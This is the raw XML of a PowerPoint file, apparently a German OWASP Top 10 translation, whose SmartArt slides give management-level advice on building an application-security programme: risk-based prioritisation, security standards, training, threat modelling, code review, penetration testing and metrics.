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0.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+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8"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId29"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="323" r:id="rId2"/>
    <p:sldId id="277" r:id="rId3"/>
    <p:sldId id="318" r:id="rId4"/>
    <p:sldId id="326" r:id="rId5"/>
    <p:sldId id="327" r:id="rId6"/>
    <p:sldId id="274" r:id="rId7"/>
    <p:sldId id="301" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="304" r:id="rId10"/>
    <p:sldId id="307" r:id="rId11"/>
    <p:sldId id="303" r:id="rId12"/>
    <p:sldId id="309" r:id="rId13"/>
    <p:sldId id="315" r:id="rId14"/>
    <p:sldId id="311" r:id="rId15"/>
    <p:sldId id="308" r:id="rId16"/>
    <p:sldId id="310" r:id="rId17"/>
    <p:sldId id="306" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="278" r:id="rId20"/>
    <p:sldId id="302" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="322" r:id="rId27"/>
  </p:sldIdLst>
  <p:sldSz cx="6858000" cy="9906000" type="A4"/>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guide id="5" orient="horz" pos="2922">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="3914">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guide id="3" orient="horz" pos="3157">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="217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351"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 id="5" name="Torsten" initials="TG" lastIdx="0" clrIdx="5"/>
  <p:cmAuthor id="6" name="frankdoelitzscher@gmail.com" initials="f" lastIdx="1" clrIdx="6">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="7" name="frankdoelitzscher@gmail.com" initials="f [2]" lastIdx="1" clrIdx="7">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="8" name="frankdoelitzscher@gmail.com" initials="f [3]" lastIdx="1" clrIdx="8">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="9" name="martin riedel" initials="mr" lastIdx="15" clrIdx="9">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="10" name="tjherzog@web.de" initials="t" lastIdx="56" clrIdx="10">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="11" name="Tobias Glemser" initials="TG" lastIdx="2" clrIdx="11"/>
  <p:cmAuthor id="12" name="Alex F." initials="AF" lastIdx="19" clrIdx="12">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="13" name="Michael Schaefer" initials="MS" lastIdx="2" clrIdx="13">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="14" name="Christian Dresen" initials="CD" lastIdx="9" clrIdx="14">
    <p:extLst/>
  </p:cmAuthor>
  <p:cmAuthor id="15" name="Ingo Hanke" initials="IH" lastIdx="31" clrIdx="1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83276B"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="FC9803"/>
    <a:srgbClr val="D9EAD5"/>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14" autoAdjust="0"/>
    <p:restoredTop sz="86419" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="2670" y="90"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2688"/>
        <p:guide pos="1440"/>
        <p:guide pos="2880"/>
        <p:guide orient="horz" pos="3600"/>
        <p:guide orient="horz" pos="2922"/>
        <p:guide orient="horz" pos="3914"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="144"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="1" d="2"/>
          <a:sy n="1" d="2"/>
        </p:scale>
        <p:origin x="0" y="0"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2857"/>
        <p:guide pos="2137"/>
        <p:guide orient="horz" pos="3157"/>
        <p:guide pos="217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Strategy_&amp;_Metrics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OWASP_Risk_Rating_Methodology"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Education_&amp;_Guidance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SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex_German" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex_German" TargetMode="External"/><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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Start</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marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE"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Dokumentieren Sie alle Anwendungen und die zugehörigen Datenbestände. Größere Organisationen sollten die Einführung einer </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0" err="1">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Configuration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE"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Management Database (CMDB) in Betracht ziehen</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="90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de-DE" sz="1050" b="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Risiko-basierter Ansatz</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRP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marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Identifizieren Sie den</a:t>
          </a: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Schutzbedarf</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Ihrer</a:t>
          </a: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Anwendungen</a:t>
          </a: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 aus geschäftlicher Sicht. Das sollte zum Teil durch Datenschutzgesetze und andere Vorschriften motiviert sein, die für die zu schützenden Datenbestände</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="9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gelten</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de-DE" sz="1050" b="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Sorgen Sie für eine stabile Grundlage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRP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82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Erstellen Sie </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>Richtlinien und Standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> für Anwendungssicherheit, die als Basis für alle betroffenen Entwicklungsteams dienen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marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Definieren Sie einen </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>allgemeingültigen Basissatz wiederverwendbarer Sicherheitsmaßnahmen</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, die diese Richtlinien und Standards ergänzen und stellen Sie Nutzungshinweise für Design und Entwicklung bereit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marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Etablieren Sie einen </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Trainings-Plan für Anwendungssicherheit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, das sich an den verschiedenen Entwicklungsaufgaben und Themenkomplexen orientiert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de-DE" sz="1050" b="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Integrieren Sie Sicherheit in Ihre bestehen-den Prozesse</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRP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marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Legen Sie Ihre Aktivitäten bzgl. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>sicherer Implementierung</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> und </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>Verifikation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> fest und integrieren Sie diese in existierende Entwicklungs- und Anwendungsprozesse. Diese umfassen die </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>Modellierung der Bedrohungen</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, sicheres Design und </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>Design-Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, sichere Programmierung und </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>Code-Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>Penetrationstests</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> und Mängelbeseitigung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marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Stellen Sie Experten und </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>unterstützende Dienste bereit, die die Entwickler und die Projektteams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> bei der erfolgreichen Umsetzung unterstützen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endParaRPr lang="en-US" sz="1050" b="1">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRP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marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Arbeiten Sie mit Metriken. Treiben Sie Verbesserungs- und Budget-Entscheidungen voran, die auf diesen Metriken und Analysedaten beruhen. Solche Metriken umfassen die Beachtung von Sicherheitspraktiken und -aktivitäten, neue oder entschärfte Sicherheitslücken, erfasste Anwendungen, Fehlerdichte nach Art und Anzahl </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>etc</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marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Analysieren Sie Ihre Implementierungs- und Prüfungsaktivitäten hinsichtlich der Hauptursachen und Muster für Sicherheitslücken. Treiben Sie so strategische und systemische Verbesserungen in Ihrer Organisation voran. Lernen Sie aus Fehlern und setzen Sie positive Anreize um Verbesserungen zu fördern</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="9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marL="82800" indent="-82800" algn="l" rtl="0"/>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Legen Sie Prüfu</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="9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ngsrichtlinien fest, um einen angemessenen Abdeckungsgrad und den geforderten Reifegrad festzulegen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t>
          </a:r>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marL="82800" indent="-82800" algn="l" rtl="0"/>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Messen und priorisieren Sie dementsprechend alle Ihre Anwendungen und APIs. Fügen Sie die Ergebnisse in Ihre CMDB ein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marL="82800" indent="-82800" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Erstellen Sie ein </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>Risikobewertungsmodell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> mit einem einheitlichen System von Wahrscheinlichkeiten und Auswirkungen, welches die Bereitschaft Ihrer Organisation berücksichtigt, Risiken einzugehen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de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Führen Sie einen </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>Anwendungssicherheits-Leitfaden</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> ein und fördern Sie dessen Akzeptanz</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t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C02DB81-333D-C748-8AF4-65359B719E74}" type="sibTrans" cxnId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5330F5FD-52B0-144C-814A-D62027712440}" type="parTrans" cxnId="{AFB279A7-B036-2C4F-8DD8-37D715363A8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de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Führen Sie eine </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>Gap-Analyse der Fähigkeiten Ihrer Organisation zu vergleichbaren Organisationen </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>durch, um wichtige Verbesserungsfelder und einen Maßnahmenplan festzulegen</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t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}" type="sibTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" type="par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de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Führen Sie mit Zustimmung der Geschäftsleitung eine </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>Kampagne zur Sensibilisierung für Fragen der Anwendungssicherheit</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-DE" sz="900" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> für Ihre gesamte IT-Organisation durch</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a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41E4CEE4-E668-414D-904A-3A62818B4066}" type="sibTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" type="parTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE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30117" custScaleY="56609">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5" custScaleY="64948">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custScaleY="56609">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5" custScaleY="66081">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custScaleY="56609" custLinFactNeighborX="30">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5" custScaleY="62723">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custScaleY="56521">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleY="53130">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>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custScaleY="56521">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5" custScaleY="63359">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{2F80760B-CAFC-4846-A58F-E09AC74FC5DD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EA88B819-0C50-2040-9AE6-390D3F7E426F}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4AAFEA1C-0D0F-B34B-A23B-00BCE0C7AB80}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{846B9F3D-0100-664F-9893-070718EA3806}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E477C266-8354-2E4E-B998-1968C3E9AAC3}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{469E487E-F0E4-4400-AA39-3813DAC2D493}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" srcOrd="3" destOrd="0" parTransId="{8C4C6F51-54CF-4E1D-9FB8-75AB7DC25781}" sibTransId="{34F33D30-9604-4CC9-AB5D-13D7672AE842}"/>
    <dgm:cxn modelId="{F8C64B7F-B60A-9741-85BE-D7EA2B668159}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
